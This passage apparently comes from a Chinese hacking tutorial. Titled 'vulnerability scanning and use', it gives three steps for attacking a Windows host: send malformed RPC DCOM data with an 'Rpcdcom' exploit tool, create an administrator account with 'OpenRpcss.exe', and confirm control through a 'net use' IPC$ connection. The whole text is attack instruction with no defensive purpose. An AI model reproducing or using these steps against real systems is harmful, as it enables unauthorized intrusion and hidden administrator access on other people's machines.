漏洞扫描与使用

步骤1　使用“Rpcdcom存在漏洞远程主机的IP地址”命令给远程主机发送畸形数据。 步骤2　使用“OpenRpcss.exe\\存在漏洞远程主机的IP地址”命令在该远程主机中建立管理员账号。 步骤3　在远程主机内部成功建立一个管理员账号后，使用“net use\\存在漏洞远程主机的IP地址\IPC$"密码"/user:"用户名"”命令，即可通过IPC$管道连接证明管理员账号是否创建成功。